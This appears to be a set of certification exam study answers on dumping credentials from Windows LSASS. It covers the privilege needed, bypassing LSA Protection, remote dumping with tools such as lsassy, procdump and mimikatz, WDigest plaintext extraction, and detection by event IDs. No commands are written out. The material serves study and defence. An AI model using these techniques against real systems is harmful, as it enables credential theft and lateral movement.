You need SeDebugPrivilege, which is granted to administrators by default. You do not need SYSTEM; an admin account can dump LSASS. In some cases, you may need to bypass LSA Protection (RunAsPPL) which requires a kernel driver. The exam often asks what privilege is required – the answer is SeDebugPrivilege.
Credential Guard uses virtualization-based security (VBS) to run a separate, isolated LSAISO process that stores credentials. LSASS itself only contains encrypted blobs. Even if an attacker dumps LSASS memory, they cannot decrypt the credentials because the keys are in the isolated environment. This makes LSASS dumps useless for credential theft.
LSA Protection (RunAsPPL) runs LSASS as a protected process, preventing non-PPL processes from opening it with full access. It can be bypassed with a kernel driver. Credential Guard isolates credentials entirely in a virtual secure environment, preventing LSASS from ever holding usable domain credentials. Credential Guard is stronger but requires VBS-capable hardware (hypervisor support, UEFI with Secure Boot) and some memory overhead.
Yes, but not with secretsdump. Impacket's secretsdump.py dumps the SAM, LSA secrets and cached domain credentials over the remote registry, and NTDS.dit from a domain controller over DRSUAPI; it never reads LSASS memory. Remote LSASS dumping uses tools such as lsassy, or procdump/comsvcs launched over PsExec, WMI or WinRM, with the dump pulled back over SMB and parsed with mimikatz or pypykatz. Either way it requires administrative credentials on the target and network access to it. The exam may test remote dumping as part of lateral movement.
WDigest is a legacy authentication protocol that stores plaintext passwords in LSASS for backward compatibility. It is disabled by default on Windows 8.1 and Server 2012 R2 and later. If enabled, mimikatz can extract plaintext passwords directly. The exam may present a scenario where WDigest is enabled to allow plaintext password extraction.
Monitor Event ID 4688 for process creation of tools like procdump, rundll32 or powershell with suspicious arguments. Event ID 4656 logs handle requests to lsass.exe with PROCESS_VM_READ access when a SACL is set on the process; Sysmon Event ID 10 records the same without one. EDR solutions can detect MiniDumpWriteDump API calls targeting lsass. Also monitor for large .dmp file creation in sensitive directories, and identify dumps by their MDMP signature rather than by extension.